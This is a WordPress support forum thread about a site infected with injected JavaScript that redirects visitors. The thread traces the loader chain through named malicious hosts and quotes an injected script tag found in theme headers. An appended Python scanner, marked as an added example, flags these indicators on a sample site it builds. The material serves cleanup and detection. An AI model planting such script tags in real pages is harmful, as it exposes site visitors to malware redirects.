This is an infection indeed.
We cannot provide you with concrete details on how to cure the infection, as it requires an internal (server-side) investigation of the website/WordPress.
The injected JavaScript first goes to https[://]pr[.]uustoughtonma[.]org/d.js, which downloads https://stat[.]uustoughtonma.org/stats%5B.%5Djs?f=pr, which finally loads cookie-based redirection malware (firing every 8 hours) that redirects to
http[://]konado[.]space/?h=475053016_949e154f16a_100&h_l=&h_5=sub_id_2&h_2=def_sub
You have to perform a full internal website audit to locate and remove the malicious code injecting this malware.
Andrew Nevins
(@anevins)
WCLDN 2018 Contributor | Volunteer support
Further to Quttera’s advice, get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.
If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.
Thread Starter
Prolet
(@prolet)
Dear Quttera and Andrew Nevins,
Thank you for your support!
Andrew, these two links are my constant helpers. I am reading all the time. And this is how I cleaned my 3 other websites!
On this one I can’t! Wordfence is 100% sure there is nothing to worry about (thank you for that! How can I rely on this plugin at all?), while Sucuri is panicking me all the time.
I just found out (to my embarrassment) that if I use the code editor on the server I will have the Doctype files… I used the text editor only.
And yet, I have no idea how to locate the file which gives the full content of the URL.
Quttera, I will do that a full audit as you suggested!
How did you solve this problem? I have the same problem, thank you.
Thread Starter
Prolet
(@prolet)
Dear nirolee,
It was a long and chaotic process. I will share with you everything I did but not in the step-by-step order.
Apparently the problem was because of the Ultimate Membership plugin. I deleted it, and no change.
It turns out that all my 4 websites were affected, plus another one which is on an Ubuntu server. All of them had the same problem.
– I deleted ultimate membership files. I even deleted everything related to it in the database.
– I deleted all WP files and folders (except wp-content, wp-config and .htaccess) and uploaded all new WP files
– I scanned all with Wordfence and repaired all files as suggested
– I deleted this <script type='text/javascript' src='https://stat.uustoughtonma.org/stats.js?f=4' which was between <header> and </header> in the header.html file in EVERY THEME you have!
– I deleted a similar script text AFTER the </header> tag in the same files.
Eventually I was able to load the websites without the nasty redirection but when I was logged in I had the same problem.
Every time I opened the dashboard I got the redirection again.
It turns out that at the end of every page there was the same script too. I deleted it all, page by page.
Also in .htaccess I found this:
<Files 403.shtml>
order allow,deny
allow from all
</Files>
Every article I read about it suggests that this is a bad hack. Only one article suggested that it is a security code, either from the server or from a security plugin.
My hosting company said they have no idea what this is, and I deleted it. It didn’t harm any of the websites but probably helped the whole process of getting rid of the hack.
After all of that I can load the websites and work in the background without visible problems.
I hope this will help you!
Good luck!
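As an added example that is not part of this thread (the poster's cleanup above was done by hand), a small Python scanner that walks a WordPress directory tree and flags the two indicators the posts describe: <script> tags loading from the named uustoughtonma.org hosts, and the <Files 403.shtml> block in .htaccess. The host list is an assumption that covers only what this thread names, and the sample site the script builds is constructed for the demo.

```python
import os
import re
import tempfile

# Hosts quoted in the thread; assumed complete only for this case (extend as an audit uncovers more).
INJECTED_HOSTS = ("pr.uustoughtonma.org", "stat.uustoughtonma.org")
SCRIPT_RE = re.compile(
    r"<script[^>]*src=['\"]?https?://(?P<host>"
    + "|".join(re.escape(h) for h in INJECTED_HOSTS) + r")", re.I)
# The .htaccess block the poster found (Apache 2.2 "order allow,deny / allow from all" syntax).
HTACCESS_RE = re.compile(
    r"<Files\s+403\.shtml>\s*order\s+allow,deny\s*allow\s+from\s+all\s*</Files>", re.I)

def scan_tree(root):
    """Return sorted (relative path, finding) pairs for injected <script> tags
    and the 403.shtml .htaccess block anywhere under root."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip, a real audit would log it
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name == ".htaccess" and HTACCESS_RE.search(text):
                findings.append((rel, "htaccess:403.shtml block"))
            for m in SCRIPT_RE.finditer(text):
                findings.append((rel, "script:" + m.group("host").lower()))
    return sorted(findings)

def build_sample_site():
    """Constructed WordPress-like tree (not a real site): one infected theme header,
    one clean theme whose footer carries the second loader, and the suspicious .htaccess."""
    root = tempfile.mkdtemp(prefix="wpscan_")
    files = {
        "wp-content/themes/twentyseventeen/header.php":
            "<header>\n<script type='text/javascript' src='https://stat.uustoughtonma.org/stats.js?f=4'></script>\n</header>\n",
        "wp-content/themes/clean/header.php": "<header><h1>Site</h1></header>\n",
        "wp-content/themes/clean/footer.php":
            "</body>\n<script src=\"https://pr.uustoughtonma.org/d.js\"></script>\n</html>\n",
        ".htaccess": "# BEGIN WordPress\n<Files 403.shtml>\norder allow,deny\nallow from all\n</Files>\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    for rel, finding in scan_tree(build_sample_site()):
        print(f"{rel}: {finding}")
```

Point scan_tree at a real document root to get the list of files that still need cleaning; remember that database-stored content (posts, widgets) is not on disk and needs a separate query.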
Thread Starter
Prolet
(@prolet)
I forgot to tell you that you must change all WP core themes. Especially take care of 2017.